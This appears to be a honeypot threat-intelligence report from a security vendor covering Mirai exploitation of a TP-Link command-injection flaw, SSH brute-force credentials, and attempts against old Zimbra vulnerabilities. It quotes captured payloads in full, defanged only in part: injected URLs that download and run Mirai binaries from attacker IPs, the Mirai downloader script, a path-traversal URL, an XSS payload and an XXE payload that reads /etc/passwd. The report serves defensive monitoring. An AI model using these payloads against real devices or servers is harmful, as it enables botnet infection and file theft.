The following report consists of TEHTRIS observations on our worldwide honeypots network to provide you with information on what is going on the Internet. This actionable cyber threat intelligence is based on observations from a real and uncontrolled environment. Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adequately adjust the cybersecurity posture.
Check out our previous report here.
Mirai botnet exploiting CVE-2023-1389 in TP-Link Archer AX21
During the past weeks, we monitored attempts to exploit CVE-2023-1389 in TP-Link Archer AX21 which was disclosed earlier this year. This command injection vulnerability allows an unauthenticated attack to inject commands, which would be run as root, with a simple POST request. We observed a peak on November 29th.
In our case, TEHTRIS Deceptive Response captured two different requests:
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf shk; wget http[:]//45.95.146[.]26/shk; chmod 777 shk; ./shk tplink; rm -rf shk`)
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; for pid in $(ls /proc | grep -E '^[0-9]+$'); do grep -q '(deleted)' /proc/$pid/maps && kill -9 $pid || true; done; rm -rf lol; wget http[:]//94.156.68[.]152/lol; chmod 777 lol; ./lol tplink; rm -rf lol`)
Both IP 45.95.146[.]26 and 94.156.68[.]152 are known for being associated with Mirai botnet, and indeed, this vulnerability has been added to the botnet’s arsenal in May 2023. The files that are meant to be downloaded are:
- shk (sha256 3ab790c0cd48d52b5d87a60b54cdd2b8ee07b9e21c84468564792670691d6d03), which downloads a payload depending on the target architecture:
Content:
binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="45.95.146[.]26"
binname="miori"
binout="system"
exec="your device just got infected to a bootnoot"
rm -rf $binout
for arch in $binarys
cd /tmp
cd /var
cd /dev
wget http://$server_ip/$binname.$arch -O $binout
curl -O $binout http://$server_ip/$binname.$arch
tftp -g -l $binout -r $binname.$arch $server_ip
chmod 777 $binout
status=
./$binout $1
if [ "$status" = "$exec" ]
- lol (sha256 dd1a057b4e4ca17de8ea1a3f8b42caefcaa8529fc7e1e83b474ef70300add23d), similar to shk
IoCs
- 120.63.180[.]123 🇮🇳
- 185.224.128[.]160 🇳🇱
- 5.248.2[.]235 🇺🇦
- 185.224.128[.]31 🇳🇱
- 179.43.163[.]130 🇨🇭
- 45.95.146[.]26 🇳🇱
- 94.156.68[.]152 🇧🇬
SSH bruteforce attacks: ttx:ttx2011
SSH bruteforce attempts are relentless. In the past 30 days, the top 10 credentials used by threat actors are the following:
Login | Password |
345gs5662d34 | 345gs5662d34 |
admin | admin |
root | root |
ubnt | ubnt |
0 | 0 |
root | password |
root | admin |
root | 123456 |
root | 12345 |
root | 3245gs5662d34 |
Between December 6th and 8th, we monitored a surge in connection attempts using credentials ttx:ttx2011 coming from 2,287 unique IP addresses.
According to security researchers, these crendetials are used by ShellBot operators to compromise poorly secured Linux servers.
All of our honeypots were targeted by these bruteforce attempts. However, Taiwan accounted for 20% of all hits, Indonesia for 13%, and Singapore and Thailand for 9%.
IoCs
- 170.64.208[.]208
- 117.6.44[.]221
- 186.67.248[.]6
- 188.18.49[.]50
- 202.83.16.8
- 27.131.36[.]170
- 43.153.35[.]39
- 103.76.123[.]85
- 118.70.170[.]120
- 129.226.83[.]30
Attempts to exploit vulnerabilities in older versions of Zimbra
Zimbra is a collaborative software suite that includes an email server and a web client. This software is often targeted by threat actors – just recently, researchers pointed out that a zero-day flaw tracked as CVE-2023-37580 (CVSS3 6.1) was actively used in the wild to target international government organizations. Well, it appears that older Zimbra vulnerabilities are still used in the wild for initial access. These past two weeks, we observed two IP addresses attempting to exploit three Zimbra vulnerabilities:
- CVE-2013-7091 (CVSS N/A), a directory traversal vulnerability in Zimbra 7.2.2 and 8.0.2 allowing attackers to read arbitrary files. The exploit is available with Metasploit.
URL: /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
- CVE-2018-14013 (CVSS3 6.1), a cross-site scripting (XSS) vulnerability in versions before 8.8.11
URL decode:
/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action&cso=0&id=""></script><script>alert(document.domain)</script>
- CVE-2019-9670 (CVSS3 9.8), an XML External Entity Injection (XXE) vulnerability. The exploit is available with Metasploit.
URL:
Autodiscover/Autodiscover.xml
RawData:
'<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>'
IoCs
- 83.97.73[.]87
- 52.87.238[.]153
Exploit attempts against Zeroshell
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots network.
Subscribe to our bi-monthly threat intelligence newsletter
Where do most attacks come from ?
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots network.
Subscribe to our bi-monthly threat intelligence newsletter
Information remain TEHTRIS sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.